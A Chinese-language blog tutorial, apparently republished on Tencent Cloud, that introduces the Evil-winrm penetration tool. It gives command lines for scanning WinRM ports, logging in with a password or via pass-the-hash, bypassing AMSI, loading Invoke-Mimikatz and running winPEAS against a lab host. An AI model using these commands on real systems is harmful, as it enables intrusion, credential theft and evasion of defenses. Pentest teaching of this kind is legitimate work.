前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >【Tools】黑客渗透超级管理终端Evil-winrm

【Tools】黑客渗透超级管理终端Evil-winrm

作者头像
释然IT杂谈
发布2024-11-27 18:26:06
发布2024-11-27 18:26:06
17900
代码可运行
举报
文章被收录于专栏:释然IT杂谈释然IT杂谈
运行总次数:0
代码可运行

前言介绍:

在网络安全领域,技术的进步总是伴随着攻防两端的较量。今天,我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm,它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议(PSRP)协同工作,利用Windows远程管理协议(WinRM)实现远程操作。

Evil-winrm工具以其多功能性和实用性脱颖而出,它不仅支持通过纯文本密码、SSL加密、NTLM哈希、密钥等多种方式进行远程登录,还具备文件传输、日志记录等高级功能。此外,该工具还能绕过某些安全软件在内存中加载DLL文件,动态绕过AMSI等安全机制。

该工具已在Kali Linux系统中集成,但如果您想单独下载使用,则可以从其官方 git 存储库下载它。作为一款开源软件,Evil-winrm的获取十分便捷,您可以直接访问GitHub上的项目页面进行下载。

https://github.com/Hackplayers/evil-winrm

WinRM服务的发现与利用:

WinRM是微软Windows操作系统中的一种远程管理协议,基于WS-Management协议,允许远程执行命令、脚本和管理任务。通过nmap工具,我们可以检测目标主机是否开启了WinRM服务的两个默认端口5895和5896,使用如下命令:

代码语言:javascript
代码运行次数:0
复制
nmap -p 5985,5986 192.168.1.19

一旦确认目标主机的WinRM服务已开启,我们便可以使用Evil-winrm进行远程管理。

多种登录方式:

Evil-winrm支持多种登录方式,包括使用纯文本密码登录、启动SSL加密的登录会话、利用NTLM哈希进行传递哈希攻击等。

纯文本密码登录:

如果您已经通过合法的枚举方式获取了目标主机的纯文本密码,您可以使用Evil-winrm工具进行远程会话。以下是如何使用Evil-winrm进行远程会话的示例命令:

代码语言:javascript
代码运行次数:0
复制
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987

可以看到, 已经成功建立起远程会话。

启动SSL加密的登录:

为了增强远程会话的安全性,可以使用Evil-winrm工具通过SSL加密WinRM连接。当启用SSL功能时,所有传输的数据都将被加密,这有助于保护会话免受中间人攻击和其他网络层面的威胁。

代码语言:javascript
代码运行次数:0
复制
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S

NTLM哈希登录:

可以通过利用evil-winrm工具执行传递哈希攻击(Pass-The-Hash)来建立PowerShell会话。这种攻击方式允许攻击者使用NTLM哈希值而不是纯文本密码进行远程登录。以下是执行此类攻击的完整命令示例:

代码语言:javascript
代码运行次数:0
复制
evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

执行PowerShell脚本:

Evil-winrm还允许用户直接从本地机器加载PowerShell脚本到目标机器的内存中,同时提供绕过AMSI的功能。

脚本获取来源:

https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1

使用以下命令可以加载并执行Mimikatz脚本:

代码语言:javascript
代码运行次数:0
复制
代码语言:javascript
代码运行次数:0
复制
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell
Bypass-4MSI
Invoke-Mimikatz.ps1

日志存储与可执行文件运行:

Evil-winrm还提供了日志存储功能,方便在CTF比赛或渗透测试中保存操作记录。同时,它还能在PowerShell会话中运行exe可执行文件,为攻击者提供了极大的便利。

日志存储:

允许通过 -l 标志将所有日志保存到本地机器

代码语言:javascript
代码运行次数:0
复制
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l

运行可执行文件:

提供了一个存储在本地机器中的 WinPEAS.exe 可执行文件的路径

代码语言:javascript
代码运行次数:0
复制
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc
Bypass-4MSI
menu
Invoke-Binary /opt/privsc/winPEASx64.exe

服务枚举与文件传输:

Evil-winrm能够列出目标系统中运行的所有服务,帮助攻击者识别未被其他工具检测到的服务。此外,它还支持文件的上传和下载,简化了在目标系统和攻击者机器之间的文件传输过程。

服务枚举:

文件传输:

总结

Evil-winrm是一个功能强大的渗透测试工具,它通过多种登录方式、脚本执行、日志存储等功能,极大地简化了渗透测试的过程。随着网络安全威胁的不断演变,工具如Evil-winrm在安全专家和渗透测试人员的工具箱中扮演着越来越重要的角色。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-11-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 释然IT杂谈 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档